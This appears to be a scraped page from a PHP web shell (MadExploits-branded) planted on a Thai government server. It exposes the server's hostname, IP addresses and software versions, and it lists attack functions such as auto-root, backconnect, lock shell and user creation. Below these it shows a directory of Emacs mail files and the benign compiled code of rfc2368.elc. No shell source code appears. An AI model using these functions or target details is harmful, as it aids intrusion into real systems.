Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
emacs /
23.1 /
lisp /
mail /
[ HOME SHELL ]
Name
Size
Permission
Action
binhex.elc
9.01
KB
-rw-r--r--
blessmail.el
2.51
KB
-rw-r--r--
emacsbug.elc
7.55
KB
-rw-r--r--
feedmail.elc
79.59
KB
-rw-r--r--
footnote.elc
21.09
KB
-rw-r--r--
hashcash.elc
10.81
KB
-rw-r--r--
mail-extr.elc
33.9
KB
-rw-r--r--
mail-hist.elc
13.74
KB
-rw-r--r--
mail-utils.elc
9.55
KB
-rw-r--r--
mailabbrev.elc
13.96
KB
-rw-r--r--
mailalias.elc
13.52
KB
-rw-r--r--
mailclient.elc
3.56
KB
-rw-r--r--
mailheader.elc
5.92
KB
-rw-r--r--
mailpost.elc
2.3
KB
-rw-r--r--
metamail.elc
4.44
KB
-rw-r--r--
mspools.elc
7.25
KB
-rw-r--r--
reporter.elc
9.65
KB
-rw-r--r--
rfc2368.elc
2.46
KB
-rw-r--r--
rfc822.elc
5.71
KB
-rw-r--r--
rmail-spam-filter.elc
13.24
KB
-rw-r--r--
rmail.elc
113.93
KB
-rw-r--r--
rmailedit.elc
8.83
KB
-rw-r--r--
rmailkwd.elc
5.12
KB
-rw-r--r--
rmailmm.elc
11.05
KB
-rw-r--r--
rmailmsc.elc
1.56
KB
-rw-r--r--
rmailout.elc
15.73
KB
-rw-r--r--
rmailsort.elc
6.33
KB
-rw-r--r--
rmailsum.elc
52.51
KB
-rw-r--r--
sendmail.elc
51.72
KB
-rw-r--r--
smtpmail.elc
21.58
KB
-rw-r--r--
supercite.elc
58.99
KB
-rw-r--r--
uce.elc
7.66
KB
-rw-r--r--
undigest.elc
7.88
KB
-rw-r--r--
unrmail.elc
4.69
KB
-rw-r--r--
uudecode.elc
6.19
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rfc2368.elc
;ELC ;;; Compiled by mockbuild@c6b8.bsys.dev.centos.org on Thu Feb 19 13:04:22 2015 ;;; from file /builddir/build/BUILD/emacs-23.1/lisp/mail/rfc2368.el ;;; in Emacs version 23.1.1 ;;; with all optimizations. ;;; This file uses dynamic docstrings, first added in Emacs 19.29. (if (and (boundp 'emacs-version) (< (aref emacs-version (1- (length emacs-version))) ?A) (or (and (boundp 'epoch::version) epoch::version) (string-lessp emacs-version "19.29"))) (error "`rfc2368.el' was compiled for Emacs 19.29 or later")) ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; #@62 Regular expression to match and aid in parsing a mailto url. (defconst rfc2368-mailto-regexp "^\\(mailto:\\)\\([^?]+\\)*\\(\\?\\(.*\\)\\)*" (#$ . 610)) #@45 Describes the 'mailto:' portion of the url. (defconst rfc2368-mailto-scheme-index 1 (#$ . 768)) #@61 Describes the portion of the url between 'mailto:' and '?'. (defconst rfc2368-mailto-prequery-index 2 (#$ . 870)) #@45 Describes the portion of the url after '?'. (defconst rfc2368-mailto-query-index 4 (#$ . 990)) #@59 Unhexify STRING -- e.g. 'hello%20there' -> 'hello there'. (defalias 'rfc2368-unhexify-string #[(string) "\301\302\303\304\211%\207" [string replace-regexp-in-string "%[[:xdigit:]]\\{2\\}" #[(match) "\301\302\303\304O\305\"!\207" [match string string-to-number 1 nil 16] 5] t] 6 (#$ . 1091)]) #@396 Parse MAILTO-URL, and return an alist of header-name, header-value pairs. MAILTO-URL should be a RFC 2368 (mailto) compliant url. A cons cell w/ a key of 'Body' is a special case and is considered a header for this purpose. The returned alist is intended for use w/ the `compose-mail' interface. Note: make sure MAILTO-URL has been 'unhtmlized' (e.g. & -> &), before calling this function. (defalias 'rfc2368-parse-mailto-url #[(mailto-url) "\306\307\211\211\310\f \"\203W \311 \"\311 \"\211\203' \312\313\314 \315\"\"\n\203S \316\n!\317\320\"\203M \317\320\"\211A\n\321Q\241\210*\202S \320\nBB\202Z \322\323!,\207" [headers-alist query prequery case-fold-search rfc2368-mailto-regexp mailto-url t nil string-match match-string mapcar #[(x) "\304\305\"\211@ \211A@)\306\307\n!!\307!+B\207" [x temp-list header-name header-value split-string "=" capitalize rfc2368-unhexify-string] 4] split-string "&" rfc2368-unhexify-string assoc "To" ", " error "Failed to match a mailto: url" rfc2368-mailto-prequery-index rfc2368-mailto-query-index our-cons-cell our-cdr] 6 (#$ . 1392)]) (provide 'rfc2368)
Close